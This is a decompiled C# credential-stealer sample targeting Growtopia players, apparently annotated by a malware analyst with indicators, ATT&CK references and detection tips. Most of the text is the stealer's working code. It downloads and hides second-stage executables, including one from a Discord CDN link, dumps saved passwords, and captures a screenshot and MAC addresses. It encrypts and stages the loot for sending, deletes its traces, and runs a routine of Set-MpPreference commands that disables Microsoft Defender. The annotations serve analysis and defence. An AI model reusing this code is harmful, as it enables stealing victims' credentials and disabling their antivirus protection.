// Token: 0x06000009 RID: 9 RVA: 0x00002C74 File Offset: 0x00000E74
//
// Analyst notes (decompiled stealer sample; code tokens left exactly as recovered).
// Purpose: downloads a helper executable into %TEMP%, runs it hidden so that it writes a
// text report, then returns the report's contents to the caller and deletes both files.
// Returns: the full text of %TEMP%\credentialslmao.txt.
// Errors: nothing is caught in this method; a failed download, or a report file that is
// missing after the fixed wait, throws to the caller.
// Host indicators visible here: %TEMP%\resourcefilehaha.exe and %TEMP%\credentialslmao.txt
// (both short-lived), plus a hidden child process launched from %TEMP% with "/stext" on
// its command line. Network side: a file download by this process (ATT&CK T1105).
private static string DINGDONGGETTROLL()
{
    string text = Environment.ExpandEnvironmentVariables("%TEMP%");
    WebClient webClient = new WebClient();
    // The download URL is not stored in clear text: the literal below is passed through
    // Executable.SUCKDICKXD, which is not part of this listing.
    // NOTE(review): presumably a decode/decrypt routine; recover the URL from that helper
    // during static analysis rather than by running the sample.
    webClient.DownloadFile(Executable.SUCKDICKXD("CW/PsKH5sxTA0WGmJaxxW1ML+wT8q90jrto/c7dDT2qpe/RLNvNoRsub28By1W82Y2d0V7rQGgEj9trh+a3AIbT/Z2/izeQvy1ntGG4lya3YSpfVpW8G+500Yecb6tYEBQuTV4kkvzbjp5q8276S65gwBQJ/dFTo2ruNnKyOV6PDfRtZ5UzH106UnQJbdjKMh/1ZVkmMjpDP8KWIUprbn7srzcR+qmWhfNc9ruueUTBIud63/BuLPxaT9QdzG1j6eP4Mc7Wj0sB784SXWjm6gQ=="), text + "\\resourcefilehaha.exe");
    webClient.Dispose();
    new Process
    {
        StartInfo = new ProcessStartInfo
        {
            // Hidden window: the user sees nothing while the helper runs.
            WindowStyle = ProcessWindowStyle.Hidden,
            FileName = text + "\\resourcefilehaha.exe",
            // NOTE(review): "/stext <file>" matches the command-line convention of
            // NirSoft-style password-recovery utilities; the payload's identity is an
            // assumption until the downloaded file itself is examined.
            Arguments = "/C /stext " + text + "\\credentialslmao.txt"
        }
    }.Start();
    // Fixed 5-second wait instead of waiting on the child process; the report is read
    // afterwards whether or not the helper has finished.
    Thread.Sleep(5000);
    // Anti-forensics: the helper binary and the report are both removed, so on-disk
    // evidence may be limited to process-creation and file-creation telemetry.
    File.Delete(text + "\\resourcefilehaha.exe");
    string result = File.ReadAllText(text + "\\credentialslmao.txt");
    File.Delete(text + "\\credentialslmao.txt");
    return(result);
}
// Token: 0x06000004 RID: 4 RVA: 0x0000215C File Offset: 0x0000035C
//
// Analyst notes (decompiled stealer sample; code tokens left exactly as recovered).
// Purpose: entry point of the stealer. In order, the visible code
//   1. records the MAC addresses of active, non-loopback interfaces to %TEMP%\macs.txt,
//   2. captures the primary screen to %TEMP%\<user>screenshot.png (ATT&CK T1113),
//   3. obtains a credential report via Executable.DINGDONGGETTROLL() and stages it as
//      %TEMP%\<user> credentials.txt,
//   4. downloads and runs a second-stage "savedecoder.exe" from a Discord CDN URL,
//   5. reads that tool's output (pwd.txt), re-encodes it into "<name>.cbuilder" and hands
//      the file plus a summary message to an IFOUGHTINWW1 object,
//   6. deletes its staging files.
// Every stage sits inside an empty catch block, so failures produce no message or crash.
// The bare string expressions with no assignment (the save.dat path, " pictures.zip",
// " credentials.txt") are decompiler residue of values that were computed and discarded.
// IFOUGHTINWW1 and the Executable.* helpers called here are not part of this listing.
//
// Indicators taken from this method:
//   network: the cdn.discordapp.com attachment URL below
//   files:   macs.txt, <user>screenshot.png, "<user> credentials.txt", savedecoder.exe,
//            pwd.txt, <name>.cbuilder, pass_decoder.exe (all under the user's Temp folder)
//   strings: "[C-Builder] Account stolen from:: " and the key literal "kljsdooqlo4454GG"
private static void Main()
{
    WebClient webClient = new WebClient();
    try
    {
        // Stops any earlier instance of the second-stage tool before starting.
        // NOTE(review): during response, check the live process list directly instead of
        // assuming this lookup found and ended the process.
        foreach (Process process in Process.GetProcessesByName("savedecoder.exe"))
        {
            process.Kill();
        }
        // Hard-coded 16-character key handed to Executable.XXX and Executable.EncryptString.
        // NOTE(review): presumably a symmetric key; if so, recovered ".cbuilder" files can
        // be decoded offline with it. Confirm the algorithm from those helpers.
        string key = "kljsdooqlo4454GG";
        // Path of the Growtopia client's save.dat; built here but unused in visible code.
        "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
        try
        {
            // Host fingerprinting: one upper-case hex MAC per line for each interface that
            // is Up and not loopback.
            StreamWriter streamWriter = new StreamWriter("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt");
            foreach (NetworkInterface networkInterface in from nic in NetworkInterface.GetAllNetworkInterfaces() where nic.OperationalStatus == OperationalStatus.Up && nic.NetworkInterfaceType != NetworkInterfaceType.Loopback select nic)
            {
                string str = string.Join("", networkInterface.GetPhysicalAddress().GetAddressBytes().Select((byte b) => b.ToString("X2")));
                streamWriter.Write(str + "\n");
            }
            streamWriter.Close();
        }
        catch
        {
        }
        try
        {
            // Full-resolution capture of the primary display only.
            Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
            using (Graphics graphics = Graphics.FromImage(bitmap))
            {
                graphics.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
                bitmap.Save(string.Concat(new string[] { "C:\\Users\\", Environment.UserName, "\\AppData\\Local\\Temp\\", Environment.UserName, "screenshot.png" }));
            }
        }
        catch
        {
        }
        bool attachments = true;
        string path = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\macs.txt";
        // NOTE(review): DINGDONGDANG is not shown; its result is later printed under the
        // "IP address::" label, so it presumably returns the host's address.
        string text = Executable.DINGDONGDANG();
        string text2 = File.ReadAllText(path);
        string str2 = Environment.ExpandEnvironmentVariables("%TEMP%");
        "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Growtopia\\save.dat";
        string.Concat(new string[] { "C:\\Users\\", Environment.UserName, "\\AppData\\Local\\Temp\\", Environment.UserName, " pictures.zip" });
        string path2 = string.Concat(new string[] { "C:\\Users\\", Environment.UserName, "\\AppData\\Local\\Temp\\", Environment.UserName, "screenshot.png" });
        // Credential report returned by the downloader helper, then staged on disk.
        string contents = Executable.DINGDONGGETTROLL();
        File.WriteAllText(str2 + "\\" + Environment.UserName + " credentials.txt", contents);
        str2 + "\\" + Environment.UserName + " credentials.txt";
        IFOUGHTINWW1 ifoughtinww = new IFOUGHTINWW1();
        // NOTE(review): HANGURSELF receives a value derived from the key and an encoded
        // literal; presumably the destination (endpoint or token) for the report. Confirm
        // from Executable.XXX and the IFOUGHTINWW1 type.
        ifoughtinww.HANGURSELF = Executable.XXX(key, "GrWz5DcWMtfQ7dy+2aTGgQ==");
        try
        {
            // Second stage hosted on a legitimate CDN: domain blocking alone is a blunt
            // control; an executable written to Temp and then run hidden is the stronger
            // detection signal.
            webClient.DownloadFile("https://cdn.discordapp.com/attachments/775300885990998059/775459023562473512/savedecrypter.exe", Path.GetTempPath() + "//savedecoder.exe");
            Process.Start(new ProcessStartInfo { WindowStyle = ProcessWindowStyle.Hidden, FileName = Path.GetTempPath() + "//savedecoder.exe" });
            // Fixed 2.5-second wait; output is only processed if pwd.txt exists by then.
            Thread.Sleep(2500);
            // The "//" and "\\" spellings below refer to the same Temp files.
            if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
            {
                File.ReadAllText(Path.GetTempPath() + "//pwd.txt");
                // pwd.txt is split on '=' into three fields. The first is reported as
                // "GrowID" below.
                // NOTE(review): the meaning of the second and third fields is not
                // established by this listing.
                string[] array = File.ReadAllText(Path.GetTempPath() + "\\pwd.txt").Split(new char[] { '=' });
                string text3 = array[0];
                string plainText = array[1];
                string plainText2 = array[2];
                // Staging file "<GrowID>.cbuilder": the three fields, each passed through
                // EncryptString with the hard-coded key, separated by '|'.
                using (StreamWriter streamWriter2 = new StreamWriter(Path.GetTempPath() + "\\" + text3 + ".cbuilder"))
                {
                    streamWriter2.Write(string.Concat(new string[] { Executable.EncryptString(key, text3), "|", Executable.EncryptString(key, plainText), "|", Executable.EncryptString(key, plainText2), "|" }));
                }
                // NOTE(review): XDLSD(path, name) presumably transmits the staged file.
                ifoughtinww.XDLSD(Path.GetTempPath() + "\\" + text3 + ".cbuilder", text3 + ".cbuilder");
                File.Delete(Path.GetTempPath() + "//pwd.txt");
                File.Delete(Path.GetTempPath() + "//savedecoder.exe");
                // Summary message: user name, machine name, GrowID, address and MAC list.
                // NOTE(review): XDLOLLMAO(message, attachments) presumably sends it; the
                // flag suggests the screenshot and credential file go with it.
                ifoughtinww.XDLOLLMAO(string.Concat(new string[] { "[C-Builder] Account stolen from:: ", Environment.UserName, " / ", Environment.MachineName, "\nGrowID :: ", text3, "\nIP address:: ", text, "\nMac addresses:: \n", text2 }), attachments);
            }
            // Anti-forensics: staged credential file, MAC list and screenshot are removed.
            // The "<GrowID>.cbuilder" file is not deleted anywhere in this method.
            if (File.Exists(str2 + "\\" + Environment.UserName + " credentials.txt"))
            {
                File.Delete(str2 + "\\" + Environment.UserName + " credentials.txt");
            }
            if (File.Exists(path))
            {
                File.Delete(path);
            }
            if (File.Exists(path2))
            {
                File.Delete(path2);
            }
            try
            {
                foreach (Process process2 in Process.GetProcessesByName("savedecoder.exe"))
                {
                    process2.Kill();
                    // "pass_decoder.exe" is not created by any code in this listing.
                    File.Delete(Path.GetTempPath() + "\\pass_decoder.exe");
                }
            }
            catch
            {
            }
        }
        catch
        {
        }
        // Final cleanup, repeated outside the inner try so it also runs after a failure
        // in the second-stage handling.
        foreach (Process process3 in Process.GetProcessesByName("savedecoder.exe"))
        {
            process3.Kill();
        }
        if (File.Exists(Path.GetTempPath() + "//pwd.txt"))
        {
            File.Delete(Path.GetTempPath() + "//pwd.txt");
        }
        if (File.Exists(Path.GetTempPath() + "//savedecoder.exe"))
        {
            File.Delete(Path.GetTempPath() + "//savedecoder.exe");
        }
    }
    catch
    {
    }
}
// Token: 0x06000006 RID: 6 RVA: 0x00002894 File Offset: 0x00000A94
//
// Analyst notes (decompiled stealer sample; code tokens left exactly as recovered).
// Purpose: defence impairment against Microsoft Defender (ATT&CK T1562.001). Runs
// "powershell Get-MpPreference -verbose" hidden, reads its output line by line, and for
// each setting that is not already at the weakened value passes a matching
// Set-MpPreference command to Executable.IDIOT (not part of this listing).
// NOTE(review): IDIOT presumably executes the string in PowerShell.
// Because the branches form one else-if chain, at most one command is issued per line.
//
// Target state, per Microsoft's Set-MpPreference documentation: real-time, behaviour,
// IOAV, archive, script and network-inspection protections disabled; block-at-first-seen
// off; SubmitSamplesConsent 2 (never send samples); MAPSReporting 0 (cloud reporting
// off); default action 6 (Allow) for low, moderate, high and severe threats.
//
// Detection and hardening:
//   - Set-MpPreference needs administrative rights; Tamper Protection rejects these changes.
//   - Microsoft-Windows-Windows Defender/Operational events 5001 (real-time protection
//     disabled) and 5007 (configuration changed).
//   - Process creation: powershell with "Get-MpPreference" or "Set-MpPreference -Disable*"
//     spawned by a non-administrative tool; PowerShell script-block logging (event 4104).
private static void WHYTFUSKID()
{
    Process process = new Process
    {
        StartInfo = new ProcessStartInfo
        {
            FileName = "powershell",
            Arguments = "Get-MpPreference -verbose",
            // Output is redirected so the current settings can be parsed in-process.
            UseShellExecute = false,
            RedirectStandardOutput = true,
            // No console window is shown while the query runs.
            WindowStyle = ProcessWindowStyle.Hidden,
            CreateNoWindow = true
        }
    };
    process.Start();
    while (!process.StandardOutput.EndOfStream)
    {
        string text = process.StandardOutput.ReadLine();
        // Boolean switches: act only when the current value reads "False".
        if (text.StartsWith("DisableRealtimeMonitoring") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisableRealtimeMonitoring $true");
        }
        else if (text.StartsWith("DisableBehaviorMonitoring") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisableBehaviorMonitoring $true");
        }
        else if (text.StartsWith("DisableBlockAtFirstSeen") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisableBlockAtFirstSeen $true");
        }
        else if (text.StartsWith("DisableIOAVProtection") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisableIOAVProtection $true");
        }
        else if (text.StartsWith("DisablePrivacyMode") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisablePrivacyMode $true");
        }
        else if (text.StartsWith("SignatureDisableUpdateOnStartupWithoutEngine") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true");
        }
        else if (text.StartsWith("DisableArchiveScanning") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisableArchiveScanning $true");
        }
        else if (text.StartsWith("DisableIntrusionPreventionSystem") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisableIntrusionPreventionSystem $true");
        }
        else if (text.StartsWith("DisableScriptScanning") && text.EndsWith("False"))
        {
            Executable.IDIOT("Set-MpPreference -DisableScriptScanning $true");
        }
        // Numeric settings: act when the current value differs from the weakened one.
        else if (text.StartsWith("SubmitSamplesConsent") && !text.EndsWith("2"))
        {
            // The literal below is wrapped across two lines in the page capture; it is
            // kept as captured.
            Executable.IDIOT("Set-MpPreference 
-SubmitSamplesConsent 2");
        }
        else if (text.StartsWith("MAPSReporting") && !text.EndsWith("0"))
        {
            Executable.IDIOT("Set-MpPreference -MAPSReporting 0");
        }
        // Threat default actions set to 6 for every severity level.
        else if (text.StartsWith("HighThreatDefaultAction") && !text.EndsWith("6"))
        {
            Executable.IDIOT("Set-MpPreference -HighThreatDefaultAction 6 -Force");
        }
        else if (text.StartsWith("ModerateThreatDefaultAction") && !text.EndsWith("6"))
        {
            Executable.IDIOT("Set-MpPreference -ModerateThreatDefaultAction 6");
        }
        else if (text.StartsWith("LowThreatDefaultAction") && !text.EndsWith("6"))
        {
            Executable.IDIOT("Set-MpPreference -LowThreatDefaultAction 6");
        }
        else if (text.StartsWith("SevereThreatDefaultAction") && !text.EndsWith("6"))
        {
            Executable.IDIOT("Set-MpPreference -SevereThreatDefaultAction 6");
        }
    }
}